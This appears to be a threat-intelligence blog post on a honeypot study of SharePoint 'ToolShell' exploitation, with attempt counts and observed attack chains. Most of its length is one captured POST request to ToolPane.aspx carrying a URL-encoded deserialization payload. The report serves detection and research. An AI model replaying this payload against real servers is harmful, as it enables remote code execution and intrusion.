SharePoint Exploit Intelligence with Honeypots

Detected 91 attempts of exploiting Toolshell in the first 48 hours; over 50% were marked “clean” on VT at time of observation.

Observed attack chains consistent with public reporting, using the spoofing/auth-bypass vuln followed by the RCE/deserialization half.

On 2025‑07‑20 (EEST), CISA flagged active exploitation of new SharePoint vulnerabilities. We immediately deployed 20 high‑interaction honeypots to:

The first 24 hours contained mostly traffic that looked like vendors scanning for signs of exploitation, i.e. GETting the spinstall0.aspx path.

POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1 .... MSOTlPn_Uri=http%3a%2f%2flocalhost%2f_controltemplates%2f15%2fAclEditor.ascx&MSOTlPn_DWP=%0a%20%20%20%20%3c%25%40%20Register%20Tagprefix%3d%22Scorecard%22%20Namespace%3d%22Microsoft.PerformancePoint.Scorecards%22%20Assembly%3d%22Microsoft.PerformancePoint.Scorecards.Client%2c%20Version%3d16.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3d71e9bce111e9429c%22%20%25%3e%0a%20%20%20%20%3c%25%40%20Register%20Tagprefix%3d%22asp%22%20Namespace%3d%22System.Web.UI%22%20Assembly%3d%22System.Web.Extensions%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3d31bf3856ad364e35%22%20%25%3e%0a%0a%3casp%3aUpdateProgress%20ID%3d%22UpdateProgress1%22%20DisplayAfter%3d%2210%22%20%0arunat%3d%22server%22%20AssociatedUpdatePanelID%3d%22upTest%22%3e%0a%3cProgressTemplate%3e%0a%20%20%3cdiv%20class%3d%22divWaiting%22%3e%20%20%20%20%20%20%20%20%20%20%20%20%0a%20%20%20%20%3cScorecard%3aExcelDataSet%20CompressedDataTable%3d%22%0d%0a%20%20%20%20%3c%25%40%20Register%20Tagprefix%3d%22Scorecard%22%20Namespace%3d%22Microsoft.PerformancePoint.Scorecards%22%20Assembly%3d%22Microsoft.PerformancePoint.Scorecards.Client%2c%20Version%3d16.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3d71e9bce111e9429c%22%20%25%3e%0d%0a%20%20%20%20%3c%25%40%20Register%20Tagprefix%3d%22asp%22%20Namespace%3d%22System.Web.UI%22%20Assembly%3d%22System.Web.Extensions%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3d31bf3856ad364e35%22%20%25%3e%0d%0a%0d%0a%3casp%3aUpdateProgress%20ID%3d%22UpdateProgress1%22%20DisplayAfter%3d%2210%22%20%0d%0arunat%3d%22server%22%20AssociatedUpdatePanelID%3d%22upTest%22%3e%0d%0a%3cProgressTemplate%3e%0d%0a%20%20%3cdiv%20class%3d%22divWaiting%22%3e%20%20%20%20%20%20%20%20%20%20%20%20%0d%0a%20%20%20%20%3cScorecard%3aExcelDataSet%20CompressedDataTable%3d%22H4sICPdrf2gAA21hcmtlci54bWwAhZJda8MgGIXv%2bytEFtgY1rSlFMR4UwYbrGzQsK%2b7t9E0shqD2qU%2ff5Kk61YGFcGb43OO75FLXZZbx%2foDDDqYXe2Z8RICZHjvauaLShnwxOjCWW%2fLQAprWNSRXoVH6Hz1kJ55CXJ0Jl8TLCKKl9aKDsk34NCQT8sM57DZKYx6V%2bZs%2b%2bSkivwUH1UV%2bGUF9Vb5DOvaKxeUxGLIxxtbDMkOXme4CqFhlLZtO25nY%2bu2dJqmE%2fq2elx3YUkkBKgL9eeBR4C8DPhxjt658uHVQdMoJ37h%2bENdWpFX2qO4AVXgzE55j5Yvd2SaTudkPlssUvRsl8iA%2b1RuzGl35zck1ybiwTTi6jrORiGyR7fJO0kMSWSe3LNkxZL1xw2nJ%2bUpGv0nG6dxWEMLNNbQFUO7Zjg9%2bzJi9A0tsNnlRQIAAA%3d%3d%22%20DataTable-CaseSensitive%3d%22false%22%20runat%3d%22server%22%3e%0a%3c%2fScorecard%3aExcelDataSet%3e%0a%20%20%3c%2fdiv%3e%0a%3c%2fProgressTemplate%3e%0a%3c%2fasp%3aUpdateProgress%3e%0a%20%20%20%20

This was an ad-hoc experiment standing up infrastructure rapidly into various public clouds. Results might be much more interesting with a longer-term deployment into less noisy infrastructure.

Leave a Comment